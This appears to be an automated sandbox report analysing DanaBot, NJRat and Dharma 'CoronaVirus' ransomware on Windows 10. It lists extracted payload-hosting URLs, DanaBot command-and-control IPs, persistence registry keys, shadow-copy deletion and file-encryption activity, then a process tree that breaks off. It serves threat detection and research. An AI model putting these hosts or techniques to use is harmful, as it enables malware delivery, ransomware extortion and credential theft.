Analysis
max time kernel: 446s
max time network: 480s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-03-2024 21:30
Static task: static1
URLScan task: urlscan1
General
Malware Config
Extracted
http://blockchainjoblist.com/wp-admin/014080/
https://womenempowermentpakistan.com/wp-admin/paba5q52/
https://atnimanvilla.com/wp-content/073735/
https://yeuquynhnhai.com/upload/41830/
https://deepikarai.com/js/4bzs6/
Extracted
danabot
51.178.195.151
51.222.39.81
149.255.35.125
38.68.50.179
51.77.7.204
Signatures
Danabot x86 payload 2 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
Processes:
resource | yara_rule
C:\Users\Admin\DOWNLO~1\DanaBot.dll | family_danabot
C:\Users\Admin\Downloads\DanaBot.dll | family_danabot
Dharma
Dharma is a ransomware family that uses security software installation to hide malicious activities.
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3440 | 5572 | powershell.exe |
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Renames multiple (501) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Blocklisted process makes network request 12 IoCs
Processes:
flow | pid | process
184 | 1056 | rundll32.exe
193 | 3440 | powershell.exe
197 | 3440 | powershell.exe
205 | 1056 | rundll32.exe
213 | 1056 | rundll32.exe
217 | 1056 | rundll32.exe
224 | 1056 | rundll32.exe
237 | 1056 | rundll32.exe
252 | 1056 | rundll32.exe
262 | 1056 | rundll32.exe
263 | 1056 | rundll32.exe
270 | 1056 | rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
pid | process
5656 | netsh.exe
Checks computer location settings 2 TTPs 11 IoCs
Looks up the country code configured in the registry, likely for geofencing.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | CoronaVirus.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | msedge.exe
Drops startup file 9 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-2F51CBF0.[coronavirus@qq.com].ncov | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | CoronaVirus.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | NJRat.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA | NJRat.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | CoronaVirus.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-2F51CBF0.[coronavirus@qq.com].ncov | CoronaVirus.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta | CoronaVirus.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | NJRat.exe
Executes dropped EXE 17 IoCs
Processes:
pid | process
2268 | DanaBot.exe
5424 | NJRat.exe
5524 | NJRat.exe
5684 | CoronaVirus.exe
2224 | CoronaVirus.exe
31240 | msedge.exe
31248 | msedge.exe
31444 | msedge.exe
31440 | msedge.exe
31704 | msedge.exe
31716 | msedge.exe
32208 | msedge.exe
32964 | msedge.exe
32976 | msedge.exe
34188 | msedge.exe
34364 | NJRat.exe
34428 | CoronaVirus.exe
Loads dropped DLL 15 IoCs
Processes:
pid | process
1492 | regsvr32.exe
1492 | regsvr32.exe
1056 | rundll32.exe
1056 | rundll32.exe
18336 | msedge.exe
31248 | msedge.exe
31240 | msedge.exe
31444 | msedge.exe
31440 | msedge.exe
31704 | msedge.exe
31716 | msedge.exe
32208 | msedge.exe
32964 | msedge.exe
32976 | msedge.exe
34188 | msedge.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials and other sensitive information.
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | NJRat.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" | CoronaVirus.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" | CoronaVirus.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" | CoronaVirus.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | NJRat.exe
Drops desktop.ini file(s) 64 IoCs
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Drops file in System32 directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\System32\CoronaVirus.exe | CoronaVirus.exe
File created | C:\Windows\System32\Info.hta | CoronaVirus.exe
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
5648 | 2268 | WerFault.exe | DanaBot.exe
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
pid | process
6320 | vssadmin.exe
7188 | vssadmin.exe
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{08EE86AE-2A58-426F-AB3F-0F735CD3CE8F} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings | msedge.exe
NTFS ADS 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 2659.crdownload:SmartScreen | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 448430.crdownload:SmartScreen | msedge.exe
File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 238417.crdownload:SmartScreen | msedge.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
pid | process
4540 | WINWORD.EXE
4540 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 42 IoCs
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3440 | powershell.exe
Token: SeDebugPrivilege | 5424 | NJRat.exe
Token: SeDebugPrivilege | 5524 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: SeBackupPrivilege | 6824 | vssvc.exe
Token: SeRestorePrivilege | 6824 | vssvc.exe
Token: SeAuditPrivilege | 6824 | vssvc.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: SeDebugPrivilege | 34364 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Token: 33 | 5424 | NJRat.exe
Token: SeIncBasePriorityPrivilege | 5424 | NJRat.exe
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid     process
3552    msedge.exe (the same browser parent, listed 64 times, once per call)
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
pid     process
3552    msedge.exe (the same browser parent, listed 26 times, once per call)
Suspicious use of SetWindowsHookEx 17 IoCs
Processes:
pid     process
4540    WINWORD.EXE (listed 17 times, once per call)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid  source process  target pid  target process
3552        msedge.exe      5048        msedge.exe   (2 entries)
3552        msedge.exe      3800        msedge.exe   (repeated many times)
3552        msedge.exe      3196        msedge.exe   (2 entries)
3552        msedge.exe      1884        msedge.exe   (repeated many times)
All 64 entries are the Edge browser process (3552) writing into its own child processes, which is how Chromium bootstraps renderers and utility processes; none of the writes targets a process outside the Edge tree.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
Tree depth is shown in brackets: [1] is the root of the run, a [2] entry is a child of the nearest [1] above it, a [3] entry a child of the nearest [2], and so on. Each entry gives the image path, then the command line, then the signatures that process triggered.

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://youtube.com
    - Enumerates system info in registry
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5d5e46f8,0x7ffc5d5e4708,0x7ffc5d5e4718
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5748 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4972 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3580 /prefetch:8
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3400 /prefetch:8
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6880 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,12273558898591367169,5978142433943315537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
